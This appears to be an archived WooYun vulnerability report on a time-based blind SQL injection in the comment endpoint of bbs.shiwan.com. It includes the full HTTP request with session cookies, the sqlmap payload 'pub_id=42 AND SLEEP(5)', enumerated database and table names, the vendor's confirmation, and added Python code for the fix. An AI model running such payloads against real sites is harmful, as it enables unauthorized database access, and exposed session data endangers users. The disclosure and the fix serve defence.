WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
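2015-04-20: Details reported to the vendor; awaiting vendor handling
2015-04-20: Vendor confirmed; details disclosed to the vendor only
2015-04-30: Details disclosed to core white hats and relevant domain experts
2015-05-10: Details disclosed to regular white hats
2015-05-20: Details disclosed to intern white hats
2015-06-04: Details disclosed to the public
I just ran a casual test... Bro, are you still going to confirm those other vulnerabilities?...
POST content: save the POST request as 1.txt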
POST /bin/comment_create.php HTTP/1.1
Host: bbs.shiwan.com
Proxy-Connection: keep-alive
Content-Length: 145
Accept: */*
Origin: http://bbs.shiwan.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 UBrowser/4.1.4627.19 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://bbs.shiwan.com/subject/177225
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=8kcf0e0st90qs2j3ojvib75tp1; Hm_lvt_b62f4400b835e82ee066d6d620606917=1429240474; Hm_lpvt_b62f4400b835e82ee066d6d620606917=1429240474; [email protected]; pgv_pvi=9918721024; pgv_si=s9459251200; current_uid=3179139; current_user_score=5; jiathis_rdc=%7B%22http%3A//bbs.shiwan.com/subject/52756%22%3A-970578339%2C%22http%3A//bbs.shiwan.com/subject/54264%22%3A-970571628%2C%22http%3A//bbs.shiwan.com/subject/186741%3F1429253894%22%3A-970234094%2C%22http%3A//bbs.shiwan.com/subject/186741%22%3A-970114428%2C%22http%3A//bbs.shiwan.com/subject/186782%22%3A-970079946%2C%22http%3A//bbs.shiwan.com/subject/115515%3F1429254745%22%3A-969704491%2C%22http%3A//bbs.shiwan.com/subject/115515%22%3A-968983514%2C%22http%3A//bbs.shiwan.com/subject/188910%22%3A-961967162%2C%22http%3A//bbs.shiwan.com/subject/75440%22%3A-961294766%2C%22http%3A//bbs.shiwan.com/subject/181846%22%3A-958908883%2C%22http%3A//bbs.shiwan.com/subject/142965%22%3A-958867674%2C%22http%3A//bbs.shiwan.com/subject/175227%22%3A-958824546%2C%22http%3A//bbs.shiwan.com/subject/186638%22%3A-958800740%2C%22http%3A//bbs.shiwan.com/subject/177545%22%3A0%7C1429265334319%2C%22http%3A//bbs.shiwan.com/subject/177225%22%3A%220%7C1429265412291%22%7D; Hm_lvt_9e00488eabf8fd23e9f79e6cffd51708=1429265188,1429265229,1429265329,1429265408; Hm_lpvt_9e00488eabf8fd23e9f79e6cffd51708=1429265450

pub_id=42&comment=023&subject_id=177225&comment_cookie_name=3179139_comment&comment_current_time=1429265891&picture_insert_src=&video_insert_src=
Then inject with sqlmap
sqlmap identified the following injection points with a total of 1461 HTTP(s) requests:
---
Place: POST
Parameter: pub_id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: pub_id=42 AND SLEEP(5)&comment=023&subject_id=177225&comment_cookie_name=3179139_comment&comment_current_time=1429265891&picture_insert_src=&video_insert_src=
---
[18:25:11] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[18:25:11] [INFO] fetching database names
[18:25:11] [INFO] fetching number of databases
[18:25:11] [INFO] retrieved:
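Time-based injection is too slow, so I'll stop here. I'm short on time and can't be bothered to go further. Anyway, given enough time, dumping the databases and so on is not a problem...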
[18:25:53] [INFO] adjusting time delay to 2 seconds due to good response times
9
[18:25:54] [INFO] retrieved: information_schema
[18:31:07] [INFO] retrieved: comment
[18:33:16] [INFO] retrieved: ismp
[18:34:39] [INFO] retrieved: mysql
[18:36:08] [INFO] retrieved: notification
[18:39:41] [INFO] retrieved: performance_schema
[18:44:47] [INFO] retrieved: publish
[18:47:00] [INFO] retrieved: qa
[18:47:24] [INFO] retrieved: shiwan
[18:49:11] [INFO] fetching tables for databases: 'comment, information_schema,smp, mysql, notification, performance_schema, publish, qa, shiwan'
[18:49:11] [INFO] fetching number of tables for database 'comment'
[18:49:11] [INFO] retrieved: 118
[18:49:35] [INFO] retrieved: activity
[18:51:49] [INFO] retrieved: comment_ext
[18:55:21] [INFO] retrieved: comment_long_0
[18:58:03] [INFO] retrieved: comment_long_1
[18:59:10] [INFO] retrieved: comment_long_2
[19:00:20] [INFO] retrieved:
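One way to close the hole reported in pub_id, as an added example that is not the vendor's code or part of the original report: validate the integer form fields strictly, then bind every value as a query parameter. The function names, the table layout and the in-memory sqlite3 database standing in for the MySQL back end are assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Fields from the request above that should only ever hold an unsigned integer.
INT_FIELDS = ("pub_id", "subject_id", "comment_current_time")
_UINT = re.compile(r"[0-9]{1,10}")

def parse_comment_form(body: str) -> dict:
    """Parse the form body; raise ValueError unless each integer field is digits only."""
    form = parse_qs(body, keep_blank_values=True, strict_parsing=True)
    clean = {}
    for name in INT_FIELDS:
        values = form.get(name, [])
        if len(values) != 1 or not _UINT.fullmatch(values[0]):
            raise ValueError(f"rejected {name}: {values!r}")
        clean[name] = int(values[0])
    comments = form.get("comment", [])
    if len(comments) != 1:
        raise ValueError("rejected comment")
    clean["comment"] = comments[0]  # free text: only ever passed as a bound parameter
    return clean

def store_comment(db, body: str) -> int:
    """Insert with bound parameters so no field is ever spliced into the SQL text."""
    f = parse_comment_form(body)
    cur = db.execute(
        "INSERT INTO comment (pub_id, subject_id, created, body) VALUES (?, ?, ?, ?)",
        (f["pub_id"], f["subject_id"], f["comment_current_time"], f["comment"]),
    )
    return cur.lastrowid

def demo():
    db = sqlite3.connect(":memory:")  # assumption: stand-in for the MySQL back end
    db.execute("CREATE TABLE comment (pub_id INTEGER, subject_id INTEGER, created INTEGER, body TEXT)")
    # Sample bodies constructed from the request and the sqlmap payload shown on this page.
    tail = "&comment=023&subject_id=177225&comment_cookie_name=3179139_comment&comment_current_time=1429265891&picture_insert_src=&video_insert_src="
    results = {}
    for label, pub_id in (("normal", "42"), ("reported", "42 AND SLEEP(5)")):
        try:
            store_comment(db, "pub_id=" + pub_id + tail)
            results[label] = "stored"
        except ValueError:
            results[label] = "rejected"
    rows = db.execute("SELECT count(*) FROM comment").fetchone()[0]
    return results, rows

if __name__ == "__main__":
    print(demo())
```

The validation alone stops the reported payload, and the bound parameters keep the query safe even if a validation rule is later relaxed.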
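Severity: High
Vulnerability Rank: 20
Confirmation time: 2015-04-20 12:16
Thank you very much for the vulnerability you reported. We will handle it as soon as possible. We hope you will keep following us and submitting vulnerabilities. Thank you.
None yet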